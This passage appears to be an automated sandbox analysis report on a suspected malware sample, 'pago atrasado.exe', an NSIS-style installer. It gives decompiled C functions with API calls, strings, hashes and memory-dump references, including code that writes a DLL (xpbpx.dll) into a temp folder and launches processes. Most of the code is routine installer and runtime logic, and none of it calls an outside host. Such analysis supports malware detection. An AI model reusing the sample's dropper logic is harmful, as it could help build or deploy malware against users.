                                            • GetProcAddress.KERNEL32(10003D2C,CorExitProcess), ref: 10008682
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 1646373207-1276376045
                                            • Opcode ID: 2a63a422e3baeebc4f5ac8df4388500ef977183468ba79ff03e06e1ce2fb8bf3
                                            • Instruction ID: 4c5b83ef195b6caa5ad471cbb6109c0cad75af4c1780a450109e40989b8f11ea
                                            • Opcode Fuzzy Hash: 2a63a422e3baeebc4f5ac8df4388500ef977183468ba79ff03e06e1ce2fb8bf3
                                            • Instruction Fuzzy Hash: B6D01730600209BBEF41DBA5CC85BA97AACEB05681F514165FA8CE60A0DB32DB60D7A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040568B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0040568B(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                            0x0040568c
                                            0x004056a3
                                            0x004056ab
                                            0x004056ab
                                            0x004056b3

                                            APIs
                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405691
                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 0040569A
                                            • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040568B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2659869361-823278215
                                            • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                            • Instruction ID: e5ee9c2d52b027f92723a61f0ff242ac356e57f7af316d882355b101730f0027
                                            • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                            • Instruction Fuzzy Hash: 05D0A972606A302AE60227158C09F8B3A2CCF02321B040462F540B6292C2BC7D818BEE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 1000E2BE, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E1000E2BE(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				void* __ebx;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E1000A910(_t50,  &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E1000E0FD( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E1000982A(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

















                                            0x1000e2c6
                                            0x1000e2cb
                                            0x1000e2e5
                                            0x00000000
                                            0x1000e2e5
                                            0x1000e2cd
                                            0x1000e2d2
                                            0x00000000
                                            0x00000000
                                            0x1000e2d7
                                            0x1000e2f4
                                            0x1000e2f9
                                            0x1000e2fc
                                            0x1000e303
                                            0x1000e322
                                            0x1000e329
                                            0x1000e32b
                                            0x1000e36f
                                            0x1000e37e
                                            0x1000e38c
                                            0x1000e38e
                                            0x1000e39e
                                            0x1000e39e
                                            0x1000e3a2
                                            0x1000e3a4
                                            0x1000e3a7
                                            0x1000e3a7
                                            0x1000e3a7
                                            0x1000e3a7
                                            0x00000000
                                            0x1000e3ad
                                            0x1000e390
                                            0x1000e390
                                            0x1000e395
                                            0x1000e395
                                            0x1000e398
                                            0x00000000
                                            0x1000e398
                                            0x1000e32d
                                            0x1000e330
                                            0x1000e334
                                            0x1000e35d
                                            0x1000e35d
                                            0x1000e360
                                            0x1000e360
                                            0x00000000
                                            0x00000000
                                            0x1000e362
                                            0x1000e366
                                            0x00000000
                                            0x00000000
                                            0x1000e368
                                            0x1000e368
                                            0x00000000
                                            0x1000e368
                                            0x1000e336
                                            0x1000e339
                                            0x00000000
                                            0x00000000
                                            0x1000e33d
                                            0x1000e350
                                            0x1000e356
                                            0x1000e359
                                            0x1000e35b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000e35b
                                            0x1000e305
                                            0x1000e308
                                            0x1000e30a
                                            0x1000e30f
                                            0x1000e30f
                                            0x1000e314
                                            0x00000000
                                            0x1000e314
                                            0x1000e2d9
                                            0x1000e2de
                                            0x1000e2e2
                                            0x1000e2e2
                                            0x00000000

                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000E2F4
                                            • __isleadbyte_l.LIBCMT ref: 1000E322
                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,00000000,00000000,?,000000AA), ref: 1000E350
                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,000000AA), ref: 1000E386
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                            • String ID:
                                            • API String ID: 3058430110-0
                                            • Opcode ID: 6f5cf4a664c4f3da983ed589d2be9ce1675f9597b158876f89940561b3aa0206
                                            • Instruction ID: 0efa3307e89526d24c36fe6befebac151ad836a38563cbc267903785e4c6cef8
                                            • Opcode Fuzzy Hash: 6f5cf4a664c4f3da983ed589d2be9ce1675f9597b158876f89940561b3aa0206
                                            • Instruction Fuzzy Hash: 3231A031600296ABEB11CF75C848BAE7FE9FF41390F128569F864A7195D730EE90DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 1001064B, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E1001064B(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E100109D4(_a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					if(_t25 != 0x66) {
						if(_t25 == 0x61 || _t25 == 0x41) {
							_t26 = E10010AA2(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							_t26 = E10010FAB(__edx, __esi, _a4, _a8, _a12, _a20, _a24, _a28);
						}
						L9:
						return _t26;
					} else {
						return E10010EEA(__edx, __esi, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                            0x1001064e
                                            0x10010654
                                            0x100106c7
                                            0x00000000
                                            0x1001065b
                                            0x1001065e
                                            0x1001067c
                                            0x100106ae
                                            0x10010683
                                            0x10010695
                                            0x10010695
                                            0x100106cc
                                            0x100106d0
                                            0x10010660
                                            0x10010678
                                            0x10010678
                                            0x1001065e

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                            • String ID:
                                            • API String ID: 3016257755-0
                                            • Opcode ID: fa8b6b89d1aa930843557c8cfc103ba220466895185e2f80efcd0b6765eb47da
                                            • Instruction ID: 637b46fedc376a00ebdecaeb4e55fad8fb1b906e7e8e5ece0182e652d1955ce7
                                            • Opcode Fuzzy Hash: fa8b6b89d1aa930843557c8cfc103ba220466895185e2f80efcd0b6765eb47da
                                            • Instruction Fuzzy Hash: 4301407660014EBBCF12DE84CC418EE3F62FF48294B548415FE9859031D276D9B1AB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 67%
                                            			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b014->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b024 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b02b = 1;
				 *0x40b028 = _t11 & 0x00000001;
				 *0x40b029 = _t11 & 0x00000002;
				 *0x40b02a = _t11 & 0x00000004;
				E00405BBA(_t18, _t24, _t26, 0x40b030,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b014);
				_push(_t14);
				_push(_t26);
				E00405AF6();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                            0x00401d46
                                            0x00401d5f
                                            0x00401d69
                                            0x00401d6e
                                            0x00401d79
                                            0x00401d80
                                            0x00401d92
                                            0x00401d98
                                            0x00401d9d
                                            0x00401da7
                                            0x004024eb
                                            0x00401561
                                            0x00402866
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                            • GetDC.USER32(?), ref: 00401D3F
                                            • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                            • CreateFontIndirectA.GDI32(0040B014), ref: 00401DA7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirect
                                            • String ID:
                                            • API String ID: 3272661963-0
                                            • Opcode ID: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                            • Instruction ID: 0c2e595a2d755a053b7cc3d6c09569b1e3f8f946256c05fe5e222a6b1ed621d0
                                            • Opcode Fuzzy Hash: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                            • Instruction Fuzzy Hash: B0F0C870E48280AFE70157705F0ABAB3F64D715305F100876F251BA2E3C7B910088BAE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x4170e0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x423f4c;
						if(_t2 >  *0x423f4c) {
							_t3 = CreateDialogParamA( *0x423f40, 0x6f, 0, E00402B6E, 0);
							 *0x4170e0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F64(0);
					}
				} else {
					_t6 =  *0x4170e0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x4170e0 = 0;
					return _t6;
				}
			}






                                            0x00402bf8
                                            0x00402c12
                                            0x00402c18
                                            0x00402c22
                                            0x00402c28
                                            0x00402c2e
                                            0x00402c3f
                                            0x00402c48
                                            0x00000000
                                            0x00402c4d
                                            0x00402c54
                                            0x00402c1a
                                            0x00402c21
                                            0x00402c21
                                            0x00402bfa
                                            0x00402bfa
                                            0x00402c01
                                            0x00402c04
                                            0x00402c04
                                            0x00402c0a
                                            0x00402c11
                                            0x00402c11

                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                            • GetTickCount.KERNEL32 ref: 00402C22
                                            • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                            • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                            • Instruction ID: 902fecb1894dce430947e24fe85b059bfb73d5b7bbd16117cdf5d745fa908bfb
                                            • Opcode Fuzzy Hash: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                            • Instruction Fuzzy Hash: 37F03030A09321ABC611EF60BE4CA9E7B74F748B417118576F201B11A4CB7858818B9D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404DD4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00404DD4(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420520 != _t22) {
							 *0x420520 = _t22;
							E00405B98(0x420538, 0x425000);
							E00405AF6(0x425000, _t22);
							E0040140B(6);
							E00405B98(0x425000, 0x420538);
						}
						L11:
						return CallWindowProcA( *0x420528, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404753(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403EA0(0x413);
				return 0;
			}




                                            0x00404de0
                                            0x00404e05
                                            0x00404e25
                                            0x00404e28
                                            0x00404e2b
                                            0x00404e42
                                            0x00404e48
                                            0x00404e4f
                                            0x00404e56
                                            0x00404e5d
                                            0x00404e62
                                            0x00404e68
                                            0x00000000
                                            0x00404e78
                                            0x00404e12
                                            0x00404e65
                                            0x00404e65
                                            0x00000000
                                            0x00404e65
                                            0x00404e1e
                                            0x00404e20
                                            0x00000000
                                            0x00404e20
                                            0x00404de6
                                            0x00000000
                                            0x00000000
                                            0x00404ded
                                            0x00000000

                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 00404E0A
                                            • CallWindowProcA.USER32 ref: 00404E78
                                              • Part of subcall function 00403EA0: SendMessageA.USER32 ref: 00403EB2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                            • Instruction ID: 907b3508a45335f305929b628defbf7950d0c65962cf50d158fef9db48df65ea
                                            • Opcode Fuzzy Hash: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                            • Instruction Fuzzy Hash: 3B11BF71600208BFDF21AF61DC4099B3769BF843A5F40803BF604791A2C7BC4991DFA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a010 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B0F(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                            0x004024f1
                                            0x004024f1
                                            0x004024f4
                                            0x0040250f
                                            0x004024f6
                                            0x004024f8
                                            0x004024fd
                                            0x00402504
                                            0x00402516
                                            0x0040268f
                                            0x0040268f
                                            0x0040251c
                                            0x0040252e
                                            0x004015a6
                                            0x004015a8
                                            0x00000000
                                            0x004015ae
                                            0x004015a8
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll, xrefs: 004024FD, 00402522
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileWritelstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll
                                            • API String ID: 427699356-1698642080
                                            • Opcode ID: 5c36ca9ac26024871935510d0a87e67fb519006a7f000f4bdfc66cd9c3aad0f4
                                            • Instruction ID: 6775f3f9e4e00d505f4e1783fd87b496617f08e9b0a5c20f68d0788d80e55df2
                                            • Opcode Fuzzy Hash: 5c36ca9ac26024871935510d0a87e67fb519006a7f000f4bdfc66cd9c3aad0f4
                                            • Instruction Fuzzy Hash: F9F08971A44244BFD710EFA49E49AEF7668DB40348F10043BF141F51C2D6FC5641966E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004053F8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004053F8(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422540->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422540,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                            0x00405401
                                            0x0040541d
                                            0x00405425
                                            0x0040542a
                                            0x00000000
                                            0x00405430
                                            0x00405434

                                            APIs
                                            Strings
                                            • Error launching installer, xrefs: 0040540B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                            • Instruction ID: 7090b7fc8b0b8bfe0e18f62cc41de09a41a9c6505e722368f6ae49628a4dc155
                                            • Opcode Fuzzy Hash: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                            • Instruction Fuzzy Hash: F6E0ECB4A00219BBDB109F64ED09AABBBBCFB00304F50C521E910E2160E774E950CA69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403556, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403556() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f4f4;
				_t3 = E0040353B(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
				return _t3;
			}







                                            0x00403557
                                            0x0040355f
                                            0x00403566
                                            0x00403569
                                            0x00403569
                                            0x0040356b
                                            0x00403570
                                            0x00403577
                                            0x0040357d
                                            0x00403581
                                            0x00403582
                                            0x0040358a

                                            APIs
                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                                            • GlobalFree.KERNEL32 ref: 00403577
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403568
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Free$GlobalLibrary
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 1100898210-823278215
                                            • Opcode ID: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                            • Instruction ID: e2315670824f3ca0981a6a6bf9743b5050639b1b799e450ff7e3175358b78d1c
                                            • Opcode Fuzzy Hash: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                            • Instruction Fuzzy Hash: 10E08C329010206BC6215F08FD0479A7A6C6B44B22F11413AE804772B0C7742D424A88
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004056D2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004056D2(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                            0x004056d3
                                            0x004056dd
                                            0x004056df
                                            0x004056e6
                                            0x004056ee
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004056ee
                                            0x004056f0
                                            0x004056f5

                                            APIs
                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\pago atrasado.exe,C:\Users\user\Desktop\pago atrasado.exe,80000000,00000003), ref: 004056D8
                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\pago atrasado.exe,C:\Users\user\Desktop\pago atrasado.exe,80000000,00000003), ref: 004056E6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
